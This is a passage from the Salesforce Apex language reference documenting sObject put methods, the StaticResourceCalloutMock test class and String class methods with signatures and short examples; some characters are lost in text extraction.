c.WhereFrom__c = 'NoAction';
} else {
System.assert(false);
}
}
}
put(String, Object)
Sets the value for the specified field and returns the previous value for the field.
Signature
public Object put(String fieldName, Object value)
Parameters
fieldName
Type: String
value
Type: Object
Return Value
Type: Object
Example
Account acc = new Account(name = 'test', description = 'old desc');
String oldDesc = (String)acc.put('description', 'new desc');
System.assertEquals('old desc', oldDesc);
System.assertEquals('new desc', acc.description);
put(Schema.SObjectField, Object)
Sets the value for the field specified by the field token Schema.sObjectField, such as, Schema.Account.AccountNumber
and returns the previous value for the field.
Signature
public Object put(Schema.SObjectField fieldName, Object value)
1715
Reference
sObject Class
Parameters
fieldName
Type: Schema.SObjectField
value
Type: Object
Return Value
Type: Object
Example
Account acc = new Account(name = 'test', description = 'old desc');
String oldDesc = (String)acc.put(Schema.Account.Description, 'new desc');
System.assertEquals('old desc', oldDesc);
System.assertEquals('new desc', acc.description);
putSObject(String, sObject)
Sets the value for the specified field. This method is primarily used with dynamic DML for setting external IDs. The method returns the
previous value of the field.
Signature
public sObject putSObject(String fieldName, sObject value)
Parameters
fieldName
Type: String
value
Type: sObject
Return Value
Type: sObject
Example
Account acc = new Account(name = 'Acme', description = 'Acme Account');
insert acc;
Contact con = new contact(lastname = 'AcmeCon', accountid = acc.id);
insert con;
Account acc2 = new account(name = 'Not Acme');
Contact contactDB =
(Contact)[SELECT Id, AccountId, Account.Name FROM Contact WHERE id = :con.id LIMIT 1];
Account a = (Account)contactDB.putSObject('Account', acc2);
System.assertEquals('Acme', a.name);
System.assertEquals('Not Acme', contactDB.Account.name);
1716
Reference
StaticResourceCalloutMock Class
putSObject(Schema.sObjectType, sObject)
Sets the value for the field specified by the token Schema.sObjectType. This method is primarily used with dynamic DML for
setting external IDs. The method returns the previous value of the field.
Signature
public sObject putSObject(Schema.sObjectType fieldName, sObject value)
Parameters
fieldName
Type: Schema.SObjectType
value
Type: sObject
Return Value
Type: sObject
setOptions(Database.DMLOptions)
Sets the DMLOptions object for the sObject.
Signature
public Void setOptions(database.DMLOptions DMLOptions)
Parameters
DMLOptions
Type: Database.DMLOptions
Return Value
Type: Void
Example
Database.DMLOptions dmo = new Database.dmlOptions();
dmo.assignmentRuleHeader.useDefaultRule = true;
Account acc = new Account(Name = 'Acme');
acc.setOptions(dmo);
StaticResourceCalloutMock Class
Utility class used to specify a fake response for testing HTTP callouts.
1717
Reference
StaticResourceCalloutMock Class
Namespace
System
Usage
Use the methods in this class to set the response properties for testing HTTP callouts.
IN THIS SECTION:
StaticResourceCalloutMock Constructors
StaticResourceCalloutMock Methods
StaticResourceCalloutMock Constructors
The following are constructors for StaticResourceCalloutMock.
IN THIS SECTION:
StaticResourceCalloutMock()
Creates a new instance of the StaticResourceCalloutMock class.
StaticResourceCalloutMock()
Creates a new instance of the StaticResourceCalloutMock class.
Signature
public StaticResourceCalloutMock()
StaticResourceCalloutMock Methods
The following are methods for StaticResourceCalloutMock. All are instance methods.
IN THIS SECTION:
setHeader(String, String)
Sets the specified header name and value for the fake response.
setStaticResource(String)
Sets the specified static resource, which contains the response body.
setStatus(String)
Sets the specified HTTP status for the response.
setStatusCode(Integer)
Sets the specified HTTP status for the response.
setHeader(String, String)
Sets the specified header name and value for the fake response.
1718
Reference
StaticResourceCalloutMock Class
Signature
public Void setHeader(String headerName, String headerValue)
Parameters
headerName
Type: String
headerValue
Type: String
Return Value
Type: Void
setStaticResource(String)
Sets the specified static resource, which contains the response body.
Signature
public Void setStaticResource(String resourceName)
Parameters
resourceName
Type: String
Return Value
Type: Void
setStatus(String)
Sets the specified HTTP status for the response.
Signature
public Void setStatus(String httpStatus)
Parameters
httpStatus
Type: String
Return Value
Type: Void
1719
Reference
String Class
setStatusCode(Integer)
Sets the specified HTTP status for the response.
Signature
public Void setStatusCode(Integer httpStatusCode)
Parameters
httpStatusCode
Type: Integer
Return Value
Type: Void
String Class
Contains methods for the String primitive data type.
Namespace
System
Usage
For more information on Strings, see Primitive Data Types on page 26.
String Methods
The following are methods for String.
IN THIS SECTION:
abbreviate(Integer)
Returns an abbreviated version of the String, of the specified length and with ellipses appended if the current String is longer than
the specified length; otherwise, returns the original String without ellipses.
abbreviate(Integer, Integer)
Returns an abbreviated version of the String, starting at the specified character offset and of the specified length. The returned String
has ellipses appended at the start and the end if characters have been removed at these locations.
capitalize()
Returns the current String with the first letter changed to title case.
center(Integer)
Returns a version of the current String of the specified size padded with spaces on the left and right, so that it appears in the center.
If the specified size is smaller than the current String size, the entire String is returned without added spaces.
1720
Reference
String Class
center(Integer, String)
Returns a version of the current String of the specified size padded with the specified String on the left and right, so that it appears
in the center. If the specified size is smaller than the current String size, the entire String is returned without padding.
charAt(Integer)
Returns the value of the character at the specified index.
codePointAt(Integer)
Returns the Unicode code point value at the specified index.
codePointBefore(Integer)
Returns the Unicode code point value that occurs before the specified index.
codePointCount(Integer, Integer)
Returns the number of Unicode code points within the specified text range.
compareTo(String)
Compares two strings lexicographically, based on the Unicode value of each character in the Strings.
contains(String)
Returns true if and only if the String that called the method contains the specified sequence of characters in the compString.
containsAny(String)
Returns true if the current String contains any of the characters in the specified String; otherwise, returns false.
containsIgnoreCase(String)
Returns true if the current String contains the specified sequence of characters without regard to case; otherwise, returns false.
containsNone(String)
Returns true if the current String doesnt contain the specified sequence of characters; otherwise, returns false.
containsOnly(String)
Returns true if the current String contains characters only from the specified sequence of characters and not any other characters;
otherwise, returns false.
containsWhitespace()
Returns true if the current String contains any white space characters; otherwise, returns false.
countMatches(String)
Returns the number of times the specified substring occurs in the current String.
deleteWhitespace()
Returns a version of the current String with all white space characters removed.
difference(String)
Returns the difference between the current String and the specified String.
endsWith(String)
Returns true if the String that called the method ends with the specified suffix.
endsWithIgnoreCase(String)
Returns true if the current String ends with the specified suffix; otherwise, returns false.
equals(String)
Returns true if the compString is not null and represents the same binary sequence of characters as the String that called the
method. This method is true whenever the compareTo method returns 0. For example:
1721
Reference
String Class
equalsIgnoreCase(String)
Returns true if the compString is not null and represents the same sequence of characters as the String that called the method,
ignoring case. For example:
escapeCsv()
Returns a String for a CSV column enclosed in double quotes, if required.
escapeEcmaScript()
Escapes the characters in the String using EcmaScript String rules.
escapeHtml3()
Escapes the characters in a String using HTML 3.0 entities.
escapeHtml4()
Escapes the characters in a String using HTML 4.0 entities.
escapeJava()
Returns a String whose characters are escaped using Java String rules. Characters escaped include quotes and control characters,
such as tab, backslash, and carriage return characters.
escapeSingleQuotes(String)
Returns a String with the escape character (\) added before any single quotation marks in the String s.
escapeUnicode()
Returns a String whose Unicode characters are escaped to a Unicode escape sequence.
escapeXml()
Escapes the characters in a String using XML entities.
format(String, List<String>)
Treat the current string as a pattern that should be used for substitution in the same manner as apex:outputText.
fromCharArray(List<Integer>)
Returns a String from the values of the list of integers.
getChars()
Returns an array of character values that represent the characters in this string.
getCommonPrefix(List<String>)
Returns the initial sequence of characters as a String that is common to all the specified Strings.
getLevenshteinDistance(String)
Returns the Levenshtein distance between the current String and the specified String.
getLevenshteinDistance(String, Integer)
Returns the Levenshtein distance between the current String and the specified String if it is less than or equal than the given threshold;
otherwise, returns -1.
hashCode()
Returns a hash code value for this string.
indexOf(String)
Returns the index of the first occurrence of the specified substring. If the substring does not occur, this method returns -1.
indexOf(String, Integer)
Returns the zero-based index of the first occurrence of the specified substring from the point of the given index. If the substring
does not occur, this method returns -1.
1722
Reference
String Class
indexOfAny(String)
Returns the zero-based index of the first occurrence of any character specified in the substring. If none of the characters occur, returns
-1.
indexOfAnyBut(String)
Returns the zero-based index of the first occurrence of a character that is not in the specified substring. Otherwise, returns -1.
indexOfChar(Integer)
Returns the index of the first occurrence of the character that corresponds to the specified character value.
indexOfChar(Integer, Integer)
Returns the index of the first occurrence of the character that corresponds to the specified character value, starting from the specified
index.
indexOfDifference(String)
Returns the zero-based index of the character where the current String begins to differ from the specified String.
indexOfIgnoreCase(String)
Returns the zero-based index of the first occurrence of the specified substring without regard to case. If the substring does not occur,
this method returns -1.
indexOfIgnoreCase(String, Integer)
Returns the zero-based index of the first occurrence of the specified substring from the point of index i, without regard to case. If
the substring does not occur, this method returns -1.
isAllLowerCase()
Returns true if all characters in the current String are lowercase; otherwise, returns false.
isAllUpperCase()
Returns true if all characters in the current String are uppercase; otherwise, returns false.
isAlpha()
Returns true if all characters in the current String are Unicode letters only; otherwise, returns false.
isAlphaSpace()
Returns true if all characters in the current String are Unicode letters or spaces only; otherwise, returns false.
isAlphanumeric()
Returns true if all characters in the current String are Unicode letters or numbers only; otherwise, returns false.
isAlphanumericSpace()
Returns true if all characters in the current String are Unicode letters, numbers, or spaces only; otherwise, returns false.
isAsciiPrintable()
Returns true if the current String contains only ASCII printable characters; otherwise, returns false.
isBlank(String)
Returns true if the specified String is white space, empty (''), or null; otherwise, returns false.
isEmpty(String)
Returns true if the specified String is empty ('') or null; otherwise, returns false.
isNotBlank(String)
Returns true if the specified String is not whitespace, not empty (''), and not null; otherwise, returns false.
isNotEmpty(String)
Returns true if the specified String is not empty ('') and not null; otherwise, returns false.
1723
Reference
String Class
isNumeric()
Returns true if the current String contains only Unicode digits; otherwise, returns false.
isNumericSpace()
Returns true if the current String contains only Unicode digits or spaces; otherwise, returns false.
isWhitespace()
Returns true if the current String contains only white space characters or is empty; otherwise, returns false.
join(Object, String)
Joins the elements of the specified iterable object, such as a List, into a single String separated by the specified separator.
lastIndexOf(String)
Returns the index of the last occurrence of the specified substring. If the substring does not occur, this method returns -1.
lastIndexOf(String, Integer)
Returns the index of the last occurrence of the specified substring, starting from the character at index 0 and ending at the specified
index.
lastIndexOfChar(Integer)
Returns the index of the last occurrence of the character that corresponds to the specified character value.
lastIndexOfChar(Integer, Integer)
Returns the index of the last occurrence of the character that corresponds to the specified character value, starting from the specified
index.
lastIndexOfIgnoreCase(String)
Returns the index of the last occurrence of the specified substring regardless of case.
lastIndexOfIgnoreCase(String, Integer)
Returns the index of the last occurrence of the specified substring regardless of case, starting from the character at index 0 and
ending at the specified index.
left(Integer)
Returns the leftmost characters of the current String of the specified length.
leftPad(Integer)
Returns the current String padded with spaces on the left and of the specified length.
length()
Returns the number of 16-bit Unicode characters contained in the String.
mid(Integer, Integer)
Returns a new String that begins with the character at the specified zero-based startIndex with the number of characters
specified by length.
normalizeSpace()
Returns the current String with leading, trailing, and repeating white space characters removed.
offsetByCodePoints(Integer, Integer)
Returns the index of the Unicode code point that is offset by the specified number of code points, starting from the given index.
remove(String)
Removes all occurrences of the specified substring and returns the String result.
removeEnd(String)
Removes the specified substring only if it occurs at the end of the String.
1724
Reference
String Class
removeEndIgnoreCase(String)
Removes the specified substring only if it occurs at the end of the String using a case-insensitive match.
removeStart(String)
Removes the specified substring only if it occurs at the beginning of the String.
removeStartIgnoreCase(String)
Removes the specified substring only if it occurs at the beginning of the String using a case-insensitive match.
repeat(Integer)
Returns the current String repeated the specified number of times.
repeat(String, Integer)
Returns the current String repeated the specified number of times using the specified separator to separate the repeated Strings.
replace(String, String)
Replaces each substring of a string that matches the literal target sequence target with the specified literal replacement sequence
replacement.
replaceAll(String, String)
Replaces each substring of a string that matches the regular expression regExp with the replacement sequence replacement.
replaceFirst(String, String)
Replaces the first substring of a string that matches the regular expression regExp with the replacement sequence replacement.
reverse()
Returns a String with all the characters reversed.
right(Integer)
Returns the rightmost characters of the current String of the specified length.
rightPad(Integer)
Returns the current String padded with spaces on the right and of the specified length.
split(String, Integer)
Returns a list that contains each substring of the String that is terminated by the regular expression regExp, or the end of the
String.
splitByCharacterType()
Splits the current String by character type and returns a list of contiguous character groups of the same type as complete tokens.
splitByCharacterTypeCamelCase()
Splits the current String by character type and returns a list of contiguous character groups of the same type as complete tokens,
with the following exception: the uppercase character, if any, immediately preceding a lowercase character token belongs to the
following character token rather than to the preceding.
startsWith(String)
Returns true if the String that called the method begins with the specified prefix.
startsWithIgnoreCase(String)
Returns true if the current String begins with the specified prefix regardless of the prefix case.
stripHtmlTags(String)
Removes HTML markup from the input string and returns the plain text.
substring(Integer)
Returns a new String that begins with the character at the specified zero-based startIndex and extends to the end of the String.
1725
Reference
String Class
substring(Integer, Integer)
Returns a new String that begins with the character at the specified zero-based startIndex and extends to the character at
endIndex - 1.
substringAfter(String)
Returns the substring that occurs after the first occurrence of the specified separator.
substringAfterLast(String)
Returns the substring that occurs after the last occurrence of the specified separator.
substringBefore(String)
Returns the substring that occurs before the first occurrence of the specified separator.
substringBeforeLast(String)
Returns the substring that occurs before the last occurrence of the specified separator.
substringBetween(String)
Returns the substring that occurs between two instances of the specified String.
substringBetween(String, String)
Returns the substring that occurs between the two specified Strings.
swapCase(String, String)
Swaps the case of all characters and returns the resulting String.
toLowerCase()
Converts all of the characters in the String to lowercase using the rules of the default locale.
toLowerCase(String)
Converts all of the characters in the String to lowercase using the rules of the specified locale.
toUpperCase()
Converts all of the characters in the String to uppercase using the rules of the default locale.
toUpperCase(String)
Converts all of the characters in the String to the uppercase using the rules of the specified locale.
trim()
Returns a copy of the string that no longer contains any leading or trailing white space characters.
uncapitalize()
Returns the current String with the first letter in lowercase.
unescapeCsv()
Returns a String representing an unescaped CSV column.
unescapeEcmaScript()
Unescapes any EcmaScript literals found in the String.
unescapeHtml3()
Unescapes the characters in a String using HTML 3.0 entities.
unescapeHtml4()
Unescapes the characters in a String using HTML 4.0 entities.
unescapeJava()
Returns a String whose Java literals are unescaped. Literals unescaped include escape sequences for quotes (\\") and control characters,
such as tab (\\t), and carriage return (\\n).
1726
Reference
String Class
unescapeUnicode()
Returns a String whose escaped Unicode characters are unescaped.
unescapeXml()
Unescapes the characters in a String using XML entities.
valueOf(Date)
Returns a String that represents the specified Date in the standard yyyy-MM-dd format.
valueOf(Datetime)
Returns a String that represents the specified Datetime in the standard yyyy-MM-dd HH:mm:ss format for the local time zone.
valueOf(Decimal)
Returns a String that represents the specified Decimal.
valueOf(Double)
Returns a String that represents the specified Double.
valueOf(Integer)
Returns a String that represents the specified Integer.
valueOf(Long)
Returns a String that represents the specified Long.
valueOf(Object)
Returns a string representation of the specified object argument.
valueOfGmt(Datetime)
Returns a String that represents the specified Datetime in the standard yyyy-MM-dd HH:mm:ss format for the GMT time zone.
abbreviate(Integer)
Returns an abbreviated version of the String, of the specified length and with ellipses appended if the current String is longer than the
specified length; otherwise, returns the original String without ellipses.
Signature
public String abbreviate(Integer maxWidth)
Parameters
maxWidth
Type: Integer
If maxWidth is less than four, this method throws a run-time exception.
Return Value
Type: String
Example
String s = 'Hello Maximillian';
String s2 = s.abbreviate(8);
1727
Reference
String Class
System.assertEquals('Hello...', s2);
System.assertEquals(8, s2.length());
abbreviate(Integer, Integer)
Returns an abbreviated version of the String, starting at the specified character offset and of the specified length. The returned String
has ellipses appended at the start and the end if characters have been removed at these locations.
Signature
public String abbreviate(Integer maxWidth, Integer offset)
Parameters
maxWidth
Type: Integer
Note that the offset is not necessarily the leftmost character in the returned String or the first character following the ellipses, but it
appears somewhere in the result. Regardless, abbreviate wont return a String of length greater than maxWidth.If maxWidth
is too small, this method throws a run-time exception.
offset
Type: Integer
Return Value
Type: String
Example
String s = 'Hello Maximillian';
// Start at M
String s2 = s.abbreviate(9,6);
System.assertEquals('...Max...', s2);
System.assertEquals(9, s2.length());
capitalize()
Returns the current String with the first letter changed to title case.
Signature
public String capitalize()
Return Value
Type: String
Usage
This method is based on the Character.toTitleCase(char) Java method.
1728
Reference
String Class
Example
String s = 'hello maximillian';
String s2 = s.capitalize();
System.assertEquals('Hello maximillian', s2);
center(Integer)
Returns a version of the current String of the specified size padded with spaces on the left and right, so that it appears in the center. If
the specified size is smaller than the current String size, the entire String is returned without added spaces.
Signature
public String center(Integer size)
Parameters
size
Type: Integer
Return Value
Type: String
Example
String s = 'hello';
String s2 = s.center(9);
System.assertEquals(
' hello ',
s2);
center(Integer, String)
Returns a version of the current String of the specified size padded with the specified String on the left and right, so that it appears in
the center. If the specified size is smaller than the current String size, the entire String is returned without padding.
Signature
public String center(Integer size, String padStr)
Parameters
size
Type: Integer
padStr
Type: String
Return Value
Type: String
1729
Reference
String Class
Example
String s = 'hello';
String s2 = s.center(9, '-');
System.assertEquals('--hello--', s2);
charAt(Integer)
Returns the value of the character at the specified index.
Signature
public Integer charAt(Integer index)
Parameters
index
Type: Integer
The index of the character to get the value of.
Return Value
Type: Integer
The integer value of the character.
Usage
The charAt method returns the value of the character pointed to by the specified index. If the index points to the beginning of a
surrogate pair (the high-surrogate code point), this method returns only the high-surrogate code point. To return the supplementary
code point corresponding to a surrogate pair, call codePointAt instead.
Example
This example gets the value of the first character at index 0.
String str = ' is Omega.';
System.assertEquals(937, str.charAt(0));
This example shows the difference between charAt and codePointAt. The example calls these methods on escaped supplementary
Unicode characters. charAt(0) returns the high surrogate value, which corresponds to \uD835. codePointAt(0) returns
the value for the entire surrogate pair.
String str = '\uD835\uDD0A';
System.assertEquals(55349, str.charAt(0),
'charAt(0) didn\'t return the high surrogate.');
System.assertEquals(120074, str.codePointAt(0),
'codePointAt(0) didn\'t return the entire two-character supplementary value.');
codePointAt(Integer)
Returns the Unicode code point value at the specified index.
1730
Reference
String Class
Signature
public Integer codePointAt(Integer index)
Parameters
index
Type: Integer
The index of the characters (Unicode code units) in the string. The index range is from zero to the string length minus one.
Return Value
Type: Integer
The Unicode code point value at the specified index.
Usage
If the index points to the beginning of a surrogate pair (the high-surrogate code point), and the character value at the following index
points to the low-surrogate code point, this method returns the supplementary code point corresponding to this surrogate pair. Otherwise,
this method returns the character value at the given index.
For more information on Unicode and surrogate pairs, see The Unicode Consortium.
Example
This example gets the code point value of the first character at index 0, which is the escaped Omega character. Also, the example gets
the code point at index 20, which corresponds to the escaped supplementary Unicode characters (a pair of characters). Finally, it verifies
that the escaped and unescaped forms of Omega have the same code point values.
The supplementary characters in this example (\\uD835\\uDD0A) correspond to mathematical fraktur capital G:
String str = '\u03A9 is (Omega), and \uD835\uDD0A ' +
' is Fraktur Capital G.';
System.assertEquals(937, str.codePointAt(0));
System.assertEquals(120074, str.codePointAt(20));
// Escaped or unescaped forms of the same character have the same code point
System.assertEquals(str.codePointAt(0), str.codePointAt(5));
codePointBefore(Integer)
Returns the Unicode code point value that occurs before the specified index.
Signature
public Integer codePointBefore(Integer index)
Parameters
index
Type: Integer
The index before the Unicode code point that is to be returned. The index range is from one to the string length.
1731
Reference
String Class
Return Value
Type: Integer
The character or Unicode code point value that occurs before the specified index.
Usage
If the character value at index-1 is the low-surrogate code point, and index-2 is not negative and the character at this index
location is the high-surrogate code point, this method returns the supplementary code point corresponding to this surrogate pair. If the
character value at index-1 is an unpaired low-surrogate or high-surrogate code point, the surrogate value is returned.
For more information on Unicode and surrogate pairs, see The Unicode Consortium.
Example
This example gets the code point value of the first character (before index 1), which is the escaped Omega character. Also, the example
gets the code point at index 20, which corresponds to the escaped supplementary characters (the two characters before index 22).
String str = '\u03A9 is (Omega), and \uD835\uDD0A ' +
' is Fraktur Capital G.';
System.assertEquals(937, str.codePointBefore(1));
System.assertEquals(120074, str.codePointBefore(22));
codePointCount(Integer, Integer)
Returns the number of Unicode code points within the specified text range.
Signature
public Integer codePointCount(Integer beginIndex, Integer endIndex)
Parameters
beginIndex
Type: Integer
The index of the first character in the range.
endIndex
Type: Integer
The index after the last character in the range.
Return Value
Type: Integer
The number of Unicode code points within the specified range.
Usage
The specified range begins at beginIndex and ends at endIndex1. Unpaired surrogates within the text range count as one
code point each.
1732
Reference
String Class
Example
This example writes the count of code points in a substring that contains an escaped Unicode character and another substring that
contains Unicode supplementary characters, which count as one code point.
String str = '\u03A9 and \uD835\uDD0A characters.';
System.debug('Count of code points for ' + str.substring(0,1)
+ ': ' + str.codePointCount(0,1));
System.debug('Count of code points for ' + str.substring(6,8)
+ ': ' + str.codePointCount(6,8));
// Output:
// Count of code points for : 1
// Count of code points for
: 1
compareTo(String)
Compares two strings lexicographically, based on the Unicode value of each character in the Strings.
Signature
public Integer compareTo(String compString)
Parameters
compString
Type: String
Return Value
Type: Integer
Usage
The result is:
A negative Integer if the String that called the method lexicographically precedes compString
A positive Integer if the String that called the method lexicographically follows compString
Zero if the Strings are equal
If there is no index position at which the Strings differ, then the shorter String lexicographically precedes the longer String.
Note that this method returns 0 whenever the equals method returns true.
Example
String myString1 = 'abcde';
String myString2 = 'abcd';
Integer result =
myString1.compareTo(myString2);
System.assertEquals(result, 1);
1733
Reference
String Class
contains(String)
Returns true if and only if the String that called the method contains the specified sequence of characters in the compString.
Signature
public Boolean contains(String compString)
Parameters
compString
Type: String
Return Value
Type: Boolean
Example
String myString1 = 'abcde';
String myString2 = 'abcd';
Boolean result =
myString1.contains(myString2);
System.assertEquals(result, true);
containsAny(String)
Returns true if the current String contains any of the characters in the specified String; otherwise, returns false.
Signature
public Boolean containsAny(String compString)
Parameters
compString
Type: String
Return Value
Type: Boolean
Example
String s = 'hello';
Boolean b1 = s.containsAny('hx');
Boolean b2 = s.containsAny('x');
System.assertEquals(true, b1);
System.assertEquals(false, b2);
1734
Reference
String Class
containsIgnoreCase(String)
Returns true if the current String contains the specified sequence of characters without regard to case; otherwise, returns false.
Signature
public Boolean containsIgnoreCase(String compString)
Parameters
compString
Type: String
Return Value
Type: Boolean
Example
String s = 'hello';
Boolean b =
s.containsIgnoreCase('HE');
System.assertEquals(
true,
b);
containsNone(String)
Returns true if the current String doesnt contain the specified sequence of characters; otherwise, returns false.
Signature
public Boolean containsNone(String compString)
Parameters
compString
Type: String
If compString is an empty string or the current String is empty, this method returns true. If compString is null, this method
returns a run-time exception.
Return Value
Type: Boolean
Example
String s1 = 'abcde';
System.assert(s1.containsNone('fg'));
1735
Reference
String Class
containsOnly(String)
Returns true if the current String contains characters only from the specified sequence of characters and not any other characters;
otherwise, returns false.
Signature
public Boolean containsOnly(String compString)
Parameters
compString
Type: String
Return Value
Type: Boolean
Example
String s1 = 'abba';
String s2 = 'abba xyz';
Boolean b1 =
s1.containsOnly('abcd');
System.assertEquals(
true,
b1);
Boolean b2 =
s2.containsOnly('abcd');
System.assertEquals(
false,
b2);
containsWhitespace()
Returns true if the current String contains any white space characters; otherwise, returns false.
Signature
public Boolean containsWhitespace()
Return Value
Type: Boolean
Example
String s = 'Hello Jane';
System.assert(s.containsWhitespace()); //true
s = 'HelloJane ';
System.assert(s.containsWhitespace()); //true
s = ' HelloJane';
1736
Reference
String Class
System.assert(s.containsWhitespace()); //true
s = 'HelloJane';
System.assert(!s.containsWhitespace()); //false
countMatches(String)
Returns the number of times the specified substring occurs in the current String.
Signature
public Integer countMatches(String compString)
Parameters
compString
Type: String
Return Value
Type: Integer
Example
String s = 'Hello Jane';
System.assertEquals(1, s.countMatches('Hello'));
s = 'Hello Hello';
System.assertEquals(2, s.countMatches('Hello'));
s = 'Hello hello';
System.assertEquals(1, s.countMatches('Hello'));
deleteWhitespace()
Returns a version of the current String with all white space characters removed.
Signature
public String deleteWhitespace()
Return Value
Type: String
Example
String s1 = ' Hello Jane ';
String s2 = 'HelloJane';
System.assertEquals(s2, s1.deleteWhitespace());
1737
Reference
String Class
difference(String)
Returns the difference between the current String and the specified String.
Signature
public String difference(String compString)
Parameters
compString
Type: String
If compString is an empty string, this method returns an empty string.If compString is null, this method throws a run-time
exception.
Return Value
Type: String
Example
String s = 'Hello Jane';
String d1 =
s.difference('Hello Max');
System.assertEquals(
'Max',
d1);
String d2 =
s.difference('Goodbye');
System.assertEquals(
'Goodbye',
d2);
endsWith(String)
Returns true if the String that called the method ends with the specified suffix.
Signature
public Boolean endsWith(String suffix)
Parameters
suffix
Type: String
Return Value
Type: Boolean
1738
Reference
String Class
Example
String s = 'Hello Jason';
System.assert(s.endsWith('Jason'));
endsWithIgnoreCase(String)
Returns true if the current String ends with the specified suffix; otherwise, returns false.
Signature
public Boolean endsWithIgnoreCase(String suffix)
Parameters
suffix
Type: String
Return Value
Type: Boolean
Example
String s = 'Hello Jason';
System.assert(s.endsWithIgnoreCase('jason'));
equals(String)
Returns true if the compString is not null and represents the same binary sequence of characters as the String that called the
method. This method is true whenever the compareTo method returns 0. For example:
Signature
public Boolean equals(String compString)
Parameters
compString
Type: String
Return Value
Type: Boolean
Usage
Note that the == operator also performs String comparison, but is case-insensitive to match Apex semantics. (== is case-sensitive for
ID comparison for the same reason.)
1739
Reference
String Class
Example
String myString1 = 'abcde';
String myString2 = 'abcd';
Boolean result =
myString1.equals(myString2);
System.assertEquals(result, false);
equalsIgnoreCase(String)
Returns true if the compString is not null and represents the same sequence of characters as the String that called the method,
ignoring case. For example:
Signature
public Boolean equalsIgnoreCase(String compString)
Parameters
compString
Type: String
Return Value
Type: Boolean
Example
String myString1 = 'abcd';
String myString2 = 'ABCD';
Boolean result =
myString1.equalsIgnoreCase(myString2);
System.assertEquals(result, true);
escapeCsv()
Returns a String for a CSV column enclosed in double quotes, if required.
Signature
public String escapeCsv()
Return Value
Type: String
Usage
If the String contains a comma, newline or double quote, the returned String is enclosed in double quotes. Also, any double quote
characters in the String are escaped with another double quote.
If the String doesnt contain a comma, newline or double quote, it is returned unchanged.
1740
Reference
String Class
Example
String s1 = 'Max1, "Max2"';
String s2 = s1.escapeCsv();
System.assertEquals('"Max1, ""Max2"""', s2);
escapeEcmaScript()
Escapes the characters in the String using EcmaScript String rules.
Signature
public String escapeEcmaScript()
Return Value
Type: String
Usage
The only difference between Apex strings and EcmaScript strings is that in EcmaScript, a single quote and forward-slash (/) are escaped.
Example
String s1 = '"grade": 3.9/4.0';
String s2 = s1.escapeEcmaScript();
System.debug(s2);
// Output is:
// \"grade\": 3.9\/4.0
System.assertEquals(
'\\"grade\\": 3.9\\/4.0',
s2);
escapeHtml3()
Escapes the characters in a String using HTML 3.0 entities.
Signature
public String escapeHtml3()
Return Value
Type: String
Example
String s1 =
'"<Black&White>"';
String s2 =
s1.escapeHtml3();
1741
Reference
String Class
System.debug(s2);
// Output:
// "<Black&
// White>"
escapeHtml4()
Escapes the characters in a String using HTML 4.0 entities.
Signature
public String escapeHtml4()
Return Value
Type: String
Example
String s1 =
'"<Black&White>"';
String s2 =
s1.escapeHtml4();
System.debug(s2);
// Output:
// "<Black&
// White>"
escapeJava()
Returns a String whose characters are escaped using Java String rules. Characters escaped include quotes and control characters, such
as tab, backslash, and carriage return characters.
Signature
public String escapeJava()
Return Value
Type: String
The escaped string.
Example
// Input string contains quotation marks
String s = 'Company: "Salesforce.com"';
String escapedStr = s.escapeJava();
// Output string has the quotes escpaded
System.assertEquals('Company: \\"Salesforce.com\\"', escapedStr);
1742
Reference
String Class
escapeSingleQuotes(String)
Returns a String with the escape character (\) added before any single quotation marks in the String s.
Signature
public static String escapeSingleQuotes(String stringToEscape)
Parameters
stringToEscape
Type: String
Return Value
Type: String
Usage
This method is useful when creating a dynamic SOQL statement, to help prevent SOQL injection. For more information on dynamic
SOQL, see Dynamic SOQL.
Example
String s = '\'Hello Jason\'';
system.debug(s); // Outputs 'Hello Jason'
String escapedStr = String.escapeSingleQuotes(s);
// Outputs \'Hello Jason\'
system.debug(escapedStr);
// Escapes the string \\\' to string \'
system.assertEquals('\\\'Hello Jason\\\'', escapedStr);
escapeUnicode()
Returns a String whose Unicode characters are escaped to a Unicode escape sequence.
Signature
public String escapeUnicode()
Return Value
Type: String
The escaped string.
Example
String s = 'De onde voc ?';
String escapedStr = s.escapeUnicode();
System.assertEquals('De onde voc\\u00EA \\u00E9?', escapedStr);
1743
Reference
String Class
escapeXml()
Escapes the characters in a String using XML entities.
Signature
public String escapeXml()
Return Value
Type: String
Usage
Supports only the five basic XML entities (gt, lt, quot, amp, apos). Does not support DTDs or external entities. Unicode characters greater
than 0x7f are not escaped.
Example
String s1 =
'"<Black&White>"';
String s2 =
s1.escapeXml();
System.debug(s2);
// Output:
// "<Black&
// White>"
format(String, List<String>)
Treat the current string as a pattern that should be used for substitution in the same manner as apex:outputText.
Signature
public static String format(String stringToFormat, List<String> formattingArguments)
Parameters
stringToFormat
Type: String
formattingArguments
Type: List<String>
Return Value
Type: String
Example
String placeholder = 'Hello {0}, {1} is cool!';
List<String> fillers = new String[]{'Jason','Apex'};
1744
Reference
String Class
fromCharArray(List<Integer>)
Returns a String from the values of the list of integers.
Signature
public static String fromCharArray(List<Integer> charArray)
Parameters
charArray
Type: List<Integer>
Return Value
Type: String
Example
List<Integer> charArr= new Integer[]{74};
String convertedChar = String.fromCharArray(charArr);
System.assertEquals('J', convertedChar);
getChars()
Returns an array of character values that represent the characters in this string.
Signature
public List<Integer> getChars()
Return Value
Type: List<String>
A list of integers, each corresponding to a character value in the string.
Example
This sample converts a string to a character array and then gets the first array element, which corresponds to the value of 'J'.
String str = 'Jane goes fishing.';
Integer[] chars = str.getChars();
// Get the value of 'J'
System.assertEquals(74, chars[0]);
1745
Reference
String Class
getCommonPrefix(List<String>)
Returns the initial sequence of characters as a String that is common to all the specified Strings.
Signature
public static String getCommonPrefix(List<String> strings)
Parameters
strings
Type: List<String>
Return Value
Type: String
Example
List<String> ls = new List<String>{'SFDCApex', 'SFDCVisualforce'};
String prefix = String.getCommonPrefix(ls);
System.assertEquals('SFDC', prefix);
getLevenshteinDistance(String)
Returns the Levenshtein distance between the current String and the specified String.
Signature
public Integer getLevenshteinDistance(String stringToCompare)
Parameters
stringToCompare
Type: String
Return Value
Type: Integer
Usage
The Levenshtein distance is the number of changes needed to change one String into another. Each change is a single character
modification (deletion, insertion or substitution).
Example
String s = 'Hello Joe';
Integer i = s.getLevenshteinDistance('Hello Max');
System.assertEquals(3, i);
1746
Reference
String Class
getLevenshteinDistance(String, Integer)
Returns the Levenshtein distance between the current String and the specified String if it is less than or equal than the given threshold;
otherwise, returns -1.
Signature
public Integer getLevenshteinDistance(String stringToCompare, Integer threshold)
Parameters
stringToCompare
Type: String
threshold
Type: Integer
